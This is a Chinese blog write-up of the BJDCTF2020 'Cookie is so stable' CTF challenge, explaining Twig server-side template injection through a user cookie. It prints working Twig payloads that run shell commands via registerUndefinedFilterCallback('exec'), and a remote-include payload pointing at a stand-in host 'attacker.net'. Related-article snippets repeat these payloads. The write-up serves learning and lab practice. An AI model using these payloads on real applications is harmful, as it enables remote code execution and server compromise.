2021-07-20 [BJDCTF2020]Cookie is so stable 知识点:SSTI Twig Cookie注入

最新推荐文章于 2024-02-28 16:11:22 发布
最新推荐文章于 2024-02-28 16:11:22 发布
阅读量338 收藏
点赞数 1
分类专栏: webctf 文章标签: web cookie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51326092/article/details/118938819
版权

**

[BJDCTF2020]Cookie is so stable

**
**

前言:

**
不得不说又是膜拜众大佬的一天,题目对于萌新来说实在是难啊,只能搜寻wp加了解知识点边学边做了o(╥﹏╥)o
BUU实现题目复现,尽管题目写着cookie,但是重点却不是这 ̄□ ̄||。
知识点:SSTI(Twig),cookie注入

**

前置知识:

**
主要就是需要了解SSTI,具体解决Twig的。
附上大佬的链接,以下两篇文章都比较详细的讲了不同类型的SSTI,讲的是针不搓!

一篇文章带你理解漏洞之SSTI漏洞
服务端模板注入攻击

**

重点:

**
一张重要经典图片:
在这里插入图片描述
Twig:
复制别人的解释:

Twig 和 Smarty 类似,不过我们不能用它调用静态方法。幸运的是,它提供了 _self,我们并不需要暴力枚举变量名。虽然 _self
没什么有用的方法,它提供了指向 Twig_Environment 的env 属性。Twig_Environment 其中的 setCache
方法则能改变 Twig 加载 PHP 文件的路径。这样一来,我们就可以通过改变路径实现 RFI了:

{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}

但是,PHP 默认禁止远程文件包含(关闭 allow_url_include),因此上述 payload 不能生效。进一步探索,我们在
getFilter 里发现了危险函数 call_user_func。通过传递传递参数到该函数中,我们可以调用任意 PHP 函数:

    ...
    foreach ($this->filterCallbacks as $callback) {
    if (false !== $filter = call_user_func($callback, $name)) {
      return $filter;
    }   }   return false; }   public function registerUndefinedFilterCallback($callable) {  
$this->filterCallbacks[] = $callable; }

我们只需注册 exec 为 filter 的回调函数,并如此调用就可以进行注入了:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

**

解题过程:

**
进入网站,发现flag.php:
开始
进入反正经过一番测试,发现是Twig:
测试语句
返回值
知道题目提示cookie,所以F12查看,发现了user,判断是cookie这边注入:
F12
所以接下来使用burpsuit抓包,进行cookie注入,写入payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

flag
**

总结:

**
做完这题,了解到SSTI还有许多种类型,学习的路还很漫长啊o(╥﹏╥)o

Sakura-501
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[BJDCTF2020]Cookie is so stable
Sk1y的博客
04-05 1648
考查的地方:模板注入,利用Twig模板本身的特性进行攻击
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
记录学习,一起进步
04-03 675
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
[BJDCTF2020]Cookie is so stable(漏洞原理详解)
pakho_C的博客
04-18 3208
web第45题 [BJDCTF2020]Cookie is so stable 打开靶场 访问flag页面 一个输入框 访问hint页面,查看源码 提示与cookie有关 那么在flag页面输入后抓包观察 输入后显示 登陆后抓包显示为 做到这里又遇到新的知识点了,模板注入漏洞 参考大佬的博客:一篇文章带你理解漏洞之 SSTI 漏洞,讲的非常详细 漏洞原理: SSTI 怎么产生的 服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过
[BJDCTF2020]Cookie is so stablessti模板注入从0到1学习笔记)
姜小孩的博客
03-31 1686
ssti模板注入从0到1 [BJDCTF2020]Cookie is so stable buu
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
scant3r:ScanT3r-网络安全扫描仪
03-16
即可在终端中运行它或访问您的脚本从api:D模组模块描述劳斯尔夫对隐藏参数进行暴力破解以发现SSRF漏洞路径检查自定义路径xss XSS扫描仪喷头在自定义标头(headers.yaml&payload.yaml)中注入盲xss和自定义有效负载...
nti2021-happyfarm
04-14
NTI CD关于信息安全的团队阶段。 工程挑战。... 在POST title参数(大概是Jinja2)中发现的SSTI一些关键字正在被过滤,而不一定是有效负载的一部分(例如config ) 此外,我们在以下方面收到了SSTI
SVM支持向量机分类鸢尾花数据集iris及代码
09-30
SVM支持向量机分类鸢尾花数据集iris及代码,数据集有Excel、data、txt文件格式,代码有data、txt格式演示
关于Twig
aetlypdlg_ys的博客
05-06 111
简单介绍下Twig sstiSSTI,即服务器端模板注入(Server-Side Template Injection)常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。sql注入的成因是从用户获得一个输入后,经过后端脚本语言进行数据库查询,这时我们就可以构造输入语句来进行拼接,从而实现我们想要的sql语句。
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)
小宇的web博客
02-18 2454
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解) 先看一下题目 有首页,有flag页面,有Hint页面 这里题目有提示,突破口是在cookie上面 这里先进行抓包分析 这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击 这里有判断模板注入类型的办法 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 这里在cookie处进行判断 user={{7*‘7’}},查看返回值
Twing模板注入 [BJDCTF2020]Cookie is so stable1
最新发布
m0_75178803的博客
02-28 457
打开题目我们先抓包分析一下可以输入{{7*7}}处发包试一下可以看到在cookie处存在ssti模板注入输入{{7*‘7’}},返回49表示是 Twig 模块输入{{7*‘7’}},返回7777777表示是模块在这里可以看出是Twing模块我们直接用固定payload就可以得到flag。
web buuctf [BJDCTF2020]Cookie is so stable
weixin_44214568的博客
03-31 495
1. 2.查看hint页面源代码,提示关键在cookie 3.用admin登录,之后刷新抓包,发现cookie: UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin 第一个是友盟的,主要看cookie中的user 4.cookie中的注入,我第一个想法就是ssti(模板注入) paylo
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 1553
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3239
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
BJDCTF-2020-Web-Cookie is so subtle!(ssti模板注入+cookie注入
weixin_45844670的博客
09-24 567
既然提示了是和cookie有关系 那么先看cookie 没什么东西 然后去flag界面查看一下 发现多了一个user参数 这里存在注入 考虑可能是SSTI注入 尝试一下 123{{9+9}} 确实可以 存在twig模板注入 payload {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 参考链接:https://www.k0rz3n.com/2018/11/12/%E4
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sakura-501

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值